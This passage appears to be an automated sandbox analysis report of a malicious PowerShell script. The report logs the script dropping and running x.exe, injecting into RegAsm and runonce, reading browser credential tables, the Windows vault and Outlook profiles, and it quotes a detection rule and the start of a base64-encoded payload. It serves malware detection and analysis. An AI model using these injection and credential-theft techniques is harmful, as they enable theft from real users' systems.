                Source: C:\Windows\SysWOW64\runonce.exeCode function: 10_2_0325B1A410_2_0325B1A4
                Source: C:\Windows\SysWOW64\runonce.exeCode function: 10_2_0325B1B010_2_0325B1B0
                Source: C:\Windows\SysWOW64\runonce.exeCode function: 10_2_0325B1F910_2_0325B1F9
                Source: C:\Windows\SysWOW64\runonce.exeCode function: 10_2_0325B06010_2_0325B060
                Source: C:\Windows\SysWOW64\runonce.exeCode function: 10_2_0325D07010_2_0325D070
                Source: C:\Windows\SysWOW64\runonce.exeCode function: 10_2_0326567010_2_03265670
                Source: C:\Windows\SysWOW64\runonce.exeCode function: 10_2_0326387B10_2_0326387B
                Source: C:\Windows\SysWOW64\runonce.exeCode function: 10_2_0326388010_2_03263880
                Source: C:\Windows\SysWOW64\runonce.exeCode function: 10_2_0327BE5010_2_0327BE50
                Source: C:\Windows\SysWOW64\runonce.exeCode function: 10_2_0503E46710_2_0503E467
                Source: C:\Windows\SysWOW64\runonce.exeCode function: 10_2_0503E7FC10_2_0503E7FC
                Source: C:\Windows\SysWOW64\runonce.exeCode function: 10_2_0503D8C810_2_0503D8C8
                Source: Joe Sandbox ViewDropped File: C:\Users\user\AppData\Local\Temp\x.exe 7D7EA0439478D6FE199D07F2FBF892ACD472BA769AA1432A87008D5EF790496F
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: String function: 02D57E54 appears 110 times
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: String function: 02D45130 appears 58 times
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: String function: 02CFB970 appears 280 times
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: String function: 02D7EA12 appears 86 times
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: String function: 02D8F290 appears 105 times
                Source: C:\Windows\SysWOW64\runonce.exeCode function: String function: 0527B970 appears 280 times
                Source: C:\Windows\SysWOW64\runonce.exeCode function: String function: 0530F290 appears 105 times
                Source: C:\Windows\SysWOW64\runonce.exeCode function: String function: 052FEA12 appears 86 times
                Source: C:\Windows\SysWOW64\runonce.exeCode function: String function: 052D7E54 appears 110 times
                Source: C:\Windows\SysWOW64\runonce.exeCode function: String function: 052C5130 appears 58 times
                Source: Process Memory Space: powershell.exe PID: 7352, type: MEMORYSTRMatched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
                Source: x.exe.0.drStatic PE information: Section: |]e@TkD ZLIB complexity 1.0003320970117846
                Source: classification engineClassification label: mal100.troj.spyw.expl.evad.winPS1@11/8@6/5
                Source: C:\Users\user\AppData\Local\Temp\x.exeFile created: C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\x.exe.logJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\x.exeMutant created: NULL
                Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7364:120:WilError_03
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_gyz32a3u.mmc.ps1Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile read: C:\Users\desktop.iniJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\SystemCertificates\CAJump to behavior
                Source: runonce.exe, 0000000A.00000002.2608327762.00000000036F3000.00000004.00000020.00020000.00000000.sdmp, runonce.exe, 0000000A.00000003.2021290021.00000000036CF000.00000004.00000020.00020000.00000000.sdmp, runonce.exe, 0000000A.00000003.2019511464.00000000036A4000.00000004.00000020.00020000.00000000.sdmp, runonce.exe, 0000000A.00000002.2608327762.00000000036C5000.00000004.00000020.00020000.00000000.sdmp, runonce.exe, 0000000A.00000003.2019614143.00000000036C5000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
                Source: LLLLLLLLASSSEERRRR.ps1ReversingLabs: Detection: 24%
                Source: unknownProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\LLLLLLLLASSSEERRRR.ps1"
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                Source: unknownProcess created: C:\Windows\System32\notepad.exe "C:\Windows\System32\notepad.exe" "C:\Users\user\Desktop\LLLLLLLLASSSEERRRR.ps1"
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Users\user\AppData\Local\Temp\x.exe "C:\Users\user\AppData\Local\Temp\x.exe"
                Source: C:\Users\user\AppData\Local\Temp\x.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
                Source: C:\Program Files (x86)\UfdujJffCftgkWIRTClUOplhWXIVwQwqHslmKQeprsvFwt\y85te3vqfc6QGAKyw78l.exeProcess created: C:\Windows\SysWOW64\runonce.exe "C:\Windows\SysWOW64\runonce.exe"
                Source: C:\Windows\SysWOW64\runonce.exeProcess created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Users\user\AppData\Local\Temp\x.exe "C:\Users\user\AppData\Local\Temp\x.exe" Jump to behavior
                Source: C:\Users\user\AppData\Local\Temp\x.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"Jump to behavior
                Source: C:\Program Files (x86)\UfdujJffCftgkWIRTClUOplhWXIVwQwqHslmKQeprsvFwt\y85te3vqfc6QGAKyw78l.exeProcess created: C:\Windows\SysWOW64\runonce.exe "C:\Windows\SysWOW64\runonce.exe"Jump to behavior
                Source: C:\Windows\SysWOW64\runonce.exeProcess created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: appresolver.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: bcp47langs.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: slc.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: sppc.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: linkinfo.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ntshrui.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cscapi.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: policymanager.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msvcp110_win.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: edputil.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.staterepositoryps.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wintypes.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: appresolver.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: bcp47langs.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: slc.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: sppc.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: apphelp.dllJump to behavior
                Source: C:\Windows\System32\notepad.exeSection loaded: kernel.appcore.dllJump to behavior
                Source: C:\Windows\System32\notepad.exeSection loaded: uxtheme.dllJump to behavior
                Source: C:\Windows\System32\notepad.exeSection loaded: mrmcorer.dllJump to behavior
                Source: C:\Windows\System32\notepad.exeSection loaded: windows.storage.dllJump to behavior
                Source: C:\Windows\System32\notepad.exeSection loaded: wldp.dllJump to behavior
                Source: C:\Windows\System32\notepad.exeSection loaded: textshaping.dllJump to behavior
                Source: C:\Windows\System32\notepad.exeSection loaded: efswrt.dllJump to behavior
                Source: C:\Windows\System32\notepad.exeSection loaded: mpr.dllJump to behavior
                Source: C:\Windows\System32\notepad.exeSection loaded: wintypes.dllJump to behavior
                Source: C:\Windows\System32\notepad.exeSection loaded: twinapi.appcore.dllJump to behavior
                Source: C:\Windows\System32\notepad.exeSection loaded: oleacc.dllJump to behavior
                Source: C:\Windows\System32\notepad.exeSection loaded: textinputframework.dllJump to behavior
                Source: C:\Windows\System32\notepad.exeSection loaded: coreuicomponents.dllJump to behavior
                Source: C:\Windows\System32\notepad.exeSection loaded: coremessaging.dllJump to behavior
                Source: C:\Windows\System32\notepad.exeSection loaded: ntmarta.dllJump to behavior
                Source: C:\Windows\System32\notepad.exeSection loaded: coremessaging.dllJump to behavior
                Source: C:\Windows\System32\notepad.exeSection loaded: urlmon.dllJump to behavior
                Source: C:\Windows\System32\notepad.exeSection loaded: iertutil.dllJump to behavior
                Source: C:\Windows\System32\notepad.exeSection loaded: srvcli.dllJump to behavior
                Source: C:\Windows\System32\notepad.exeSection loaded: netutils.dllJump to behavior
                Source: C:\Windows\System32\notepad.exeSection loaded: propsys.dllJump to behavior
                Source: C:\Windows\System32\notepad.exeSection loaded: policymanager.dllJump to behavior
                Source: C:\Windows\System32\notepad.exeSection loaded: msvcp110_win.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: mscoree.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: apphelp.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: kernel.appcore.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: version.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: windows.storage.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: wldp.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: profapi.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: cryptsp.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: rsaenh.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: cryptbase.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: apphelp.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: aclayers.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: mpr.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: sfc.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: sfc_os.dllJump to behavior
                Source: C:\Windows\SysWOW64\runonce.exeSection loaded: wininet.dllJump to behavior
                Source: C:\Windows\SysWOW64\runonce.exeSection loaded: kernel.appcore.dllJump to behavior
                Source: C:\Windows\SysWOW64\runonce.exeSection loaded: uxtheme.dllJump to behavior
                Source: C:\Windows\SysWOW64\runonce.exeSection loaded: ieframe.dllJump to behavior
                Source: C:\Windows\SysWOW64\runonce.exeSection loaded: iertutil.dllJump to behavior
                Source: C:\Windows\SysWOW64\runonce.exeSection loaded: netapi32.dllJump to behavior
                Source: C:\Windows\SysWOW64\runonce.exeSection loaded: version.dllJump to behavior
                Source: C:\Windows\SysWOW64\runonce.exeSection loaded: userenv.dllJump to behavior
                Source: C:\Windows\SysWOW64\runonce.exeSection loaded: winhttp.dllJump to behavior
                Source: C:\Windows\SysWOW64\runonce.exeSection loaded: wkscli.dllJump to behavior
                Source: C:\Windows\SysWOW64\runonce.exeSection loaded: netutils.dllJump to behavior
                Source: C:\Windows\SysWOW64\runonce.exeSection loaded: sspicli.dllJump to behavior
                Source: C:\Windows\SysWOW64\runonce.exeSection loaded: windows.storage.dllJump to behavior
                Source: C:\Windows\SysWOW64\runonce.exeSection loaded: wldp.dllJump to behavior
                Source: C:\Windows\SysWOW64\runonce.exeSection loaded: profapi.dllJump to behavior
                Source: C:\Windows\SysWOW64\runonce.exeSection loaded: secur32.dllJump to behavior
                Source: C:\Windows\SysWOW64\runonce.exeSection loaded: mlang.dllJump to behavior
                Source: C:\Windows\SysWOW64\runonce.exeSection loaded: propsys.dllJump to behavior
                Source: C:\Windows\SysWOW64\runonce.exeSection loaded: winsqlite3.dllJump to behavior
                Source: C:\Windows\SysWOW64\runonce.exeSection loaded: vaultcli.dllJump to behavior
                Source: C:\Windows\SysWOW64\runonce.exeSection loaded: wintypes.dllJump to behavior
                Source: C:\Windows\SysWOW64\runonce.exeSection loaded: dpapi.dllJump to behavior
                Source: C:\Windows\SysWOW64\runonce.exeSection loaded: cryptbase.dllJump to behavior
                Source: C:\Program Files (x86)\UfdujJffCftgkWIRTClUOplhWXIVwQwqHslmKQeprsvFwt\y85te3vqfc6QGAKyw78l.exeSection loaded: wininet.dllJump to behavior
                Source: C:\Program Files (x86)\UfdujJffCftgkWIRTClUOplhWXIVwQwqHslmKQeprsvFwt\y85te3vqfc6QGAKyw78l.exeSection loaded: mswsock.dllJump to behavior
                Source: C:\Program Files (x86)\UfdujJffCftgkWIRTClUOplhWXIVwQwqHslmKQeprsvFwt\y85te3vqfc6QGAKyw78l.exeSection loaded: dnsapi.dllJump to behavior
                Source: C:\Program Files (x86)\UfdujJffCftgkWIRTClUOplhWXIVwQwqHslmKQeprsvFwt\y85te3vqfc6QGAKyw78l.exeSection loaded: iphlpapi.dllJump to behavior
                Source: C:\Program Files (x86)\UfdujJffCftgkWIRTClUOplhWXIVwQwqHslmKQeprsvFwt\y85te3vqfc6QGAKyw78l.exeSection loaded: fwpuclnt.dllJump to behavior
                Source: C:\Program Files (x86)\UfdujJffCftgkWIRTClUOplhWXIVwQwqHslmKQeprsvFwt\y85te3vqfc6QGAKyw78l.exeSection loaded: rasadhlp.dllJump to behavior
                Source: C:\Windows\System32\notepad.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{11659a23-5884-4d1b-9cf6-67d6f4f90b36}\InProcServer32Jump to behavior
                Source: Window RecorderWindow detected: More than 3 window changes detected
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dllJump to behavior
                Source: C:\Windows\SysWOW64\runonce.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\15.0\Outlook\Profiles\Outlook\Jump to behavior
                Source: Binary string: runonce.pdbGCTL source: y85te3vqfc6QGAKyw78l.exe, 00000009.00000002.2608539411.000000000085E000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: wntdll.pdbUGP source: RegAsm.exe, 00000005.00000002.1836620489.0000000002CD0000.00000040.00001000.00020000.00000000.sdmp, runonce.exe, 0000000A.00000003.1838270102.000000000509F000.00000004.00000020.00020000.00000000.sdmp, runonce.exe, 0000000A.00000002.2614142025.0000000005250000.00000040.00001000.00020000.00000000.sdmp, runonce.exe, 0000000A.00000002.2614142025.00000000053EE000.00000040.00001000.00020000.00000000.sdmp, runonce.exe, 0000000A.00000003.1835974299.0000000004EE5000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: wntdll.pdb source: RegAsm.exe, RegAsm.exe, 00000005.00000002.1836620489.0000000002CD0000.00000040.00001000.00020000.00000000.sdmp, runonce.exe, runonce.exe, 0000000A.00000003.1838270102.000000000509F000.00000004.00000020.00020000.00000000.sdmp, runonce.exe, 0000000A.00000002.2614142025.0000000005250000.00000040.00001000.00020000.00000000.sdmp, runonce.exe, 0000000A.00000002.2614142025.00000000053EE000.00000040.00001000.00020000.00000000.sdmp, runonce.exe, 0000000A.00000003.1835974299.0000000004EE5000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: runonce.pdb source: y85te3vqfc6QGAKyw78l.exe, 00000009.00000002.2608539411.000000000085E000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: VZXCSD.pdb source: powershell.exe, 00000000.00000002.1362764872.000000000633A000.00000004.00000800.00020000.00000000.sdmp, x.exe, 00000004.00000000.1344241466.00000000003FE000.00000002.00000001.01000000.0000000A.sdmp, x.exe.0.dr
                Source: Binary string: VZXCSD.pdbX source: powershell.exe, 00000000.00000002.1362764872.000000000633A000.00000004.00000800.00020000.00000000.sdmp, x.exe, 00000004.00000000.1344241466.00000000003FE000.00000002.00000001.01000000.0000000A.sdmp, x.exe.0.dr
                Source: Binary string: C:\Work\JoeSecurity\trunk\src\windows\usermode\tools\FakeChrome\Release\Chrome.pdb source: y85te3vqfc6QGAKyw78l.exe, 00000009.00000000.1756318795.000000000012F000.00000002.00000001.01000000.0000000B.sdmp, y85te3vqfc6QGAKyw78l.exe, 0000000D.00000002.2602571364.000000000012F000.00000002.00000001.01000000.0000000B.sdmp

                Data Obfuscation

                barindex
                Found suspicious powershell code related to unpacking or dynamic code loading
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeAnti Malware Scan Interface: FromBase64String("TVqQAAMAAAAEAAAA//8AALgAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAgAAAAA4fug4AtAnNIbgBTM0hVGhpcyBwcm9ncmFtIGNhbm5vdCBiZSBydW4gaW4gRE9TIG1vZGUuDQ0KJAAAAAAAAABQRQAATAEFAM
                Source: x.exe.0.drStatic PE information: 0xF61719C5 [Sun Oct 31 23:37:41 2100 UTC]
                Source: x.exe.0.drStatic PE information: section name: |]e@TkD
                Source: x.exe.0.drStatic PE information: section name:
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_0041F04F push ebx; ret 5_2_0041F058
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_00403280 push eax; ret 5_2_00403282
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_0041AB61 pushfd ; ret 5_2_0041AB78
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_0041ABD6 push ds; ret 5_2_0041ABD8
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_0040D38A push edx; iretd 5_2_0040D453
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_00426CC3 pushad ; iretd 5_2_00426CEB
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_004084DA push esi; retf 5_2_004084DD
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_004084FF push ebp; iretd 5_2_00408502
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_00412559 push ecx; iretd 5_2_0041255A
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_004125DC pushfd ; iretd 5_2_004125FB
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_00405E25 push ecx; ret 5_2_00405E2B
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_00401F0E push ss; retf 5_2_00401F14
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02CD225F pushad ; ret 5_2_02CD27F9
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02CD27FA pushad ; ret 5_2_02CD27F9
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02CD283D push eax; iretd 5_2_02CD2858
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02D009AD push ecx; mov dword ptr [esp], ecx5_2_02D009B6
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02CD1368 push eax; iretd 5_2_02CD1369
                Source: C:\Windows\SysWOW64\runonce.exeCode function: 10_2_052527FA pushad ; ret 10_2_052527F9
                Source: C:\Windows\SysWOW64\runonce.exeCode function: 10_2_0525225F pushad ; ret 10_2_052527F9
                Source: C:\Windows\SysWOW64\runonce.exeCode function: 10_2_052809AD push ecx; mov dword ptr [esp], ecx10_2_052809B6
                Source: C:\Windows\SysWOW64\runonce.exeCode function: 10_2_0525283D push eax; iretd 10_2_05252858
                Source: C:\Windows\SysWOW64\runonce.exeCode function: 10_2_05251368 push eax; iretd 10_2_05251369
                Source: C:\Windows\SysWOW64\runonce.exeCode function: 10_2_03252BA2 push ecx; ret 10_2_03252BA8
                Source: C:\Windows\SysWOW64\runonce.exeCode function: 10_2_0325F359 pushfd ; iretd 10_2_0325F378
                Source: C:\Windows\SysWOW64\runonce.exeCode function: 10_2_0325527C push ebp; iretd 10_2_0325527F
                Source: C:\Windows\SysWOW64\runonce.exeCode function: 10_2_03255257 push esi; retf 10_2_0325525A
                Source: C:\Windows\SysWOW64\runonce.exeCode function: 10_2_0325F2D6 push ecx; iretd 10_2_0325F2D7
                Source: C:\Windows\SysWOW64\runonce.exeCode function: 10_2_03267B60 push FFFFFFC3h; ret 10_2_03267BCA
                Source: C:\Windows\SysWOW64\runonce.exeCode function: 10_2_03273A40 pushad ; iretd 10_2_03273A68
                Source: C:\Windows\SysWOW64\runonce.exeCode function: 10_2_03267953 push ds; ret 10_2_03267955
                Source: C:\Windows\SysWOW64\runonce.exeCode function: 10_2_032678DE pushfd ; ret 10_2_032678F5
                Source: x.exe.0.drStatic PE information: section name: |]e@TkD entropy: 7.999327421961065
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\Temp\x.exeJump to dropped file
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
